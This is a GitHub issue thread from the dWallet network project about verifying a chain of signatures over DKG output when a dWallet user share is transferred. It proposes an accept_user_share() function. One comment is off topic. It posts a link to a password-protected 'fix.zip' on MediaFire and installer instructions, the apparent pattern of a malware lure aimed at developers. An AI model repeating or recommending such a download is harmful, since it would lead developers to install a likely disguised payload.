### ISSUE TITLE
Verify the blockchain DKG output before signing on it, Second transfer

### ISSUE THREAD

**Issue by ItayLevyOfficial** [dwallet-labs/dwallet-network#191]
_some new user of the dWallet (not the original owner that did DKG) can transfer/share the dWallet, so when they will create the EncryptedUserShare they should sign that if they believe it (even though they didn't see the DKG output themselves, they trusted the old owner that signed over it, creating a chain of signatures that should date back to the owner that created the DKG).
Potentially, we can even verify this entire chain, dating back to the original user. For now, perhaps it is sufficient that when we "accept" a user-share, we verify the signature, and then sign over the same DKG output - i.e. we should add an accept_user_share() TS function that takes an EncryptedUserShare that was encrypted to us, verifies the signature, and then encrypts it to our own encryption key with our own signature. Later, when we want to share it with someone else, we don't add a new signature - we fetch our previous signature from chain and place it there_, mentioned [here](https://github.com/dwallet-labs/dwallet-network/pull/183#discussion_r1732662682)

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ItayLevyOfficial** [comment]
moved to https://github.com/dwallet-labs/dwallet-network/issues/175
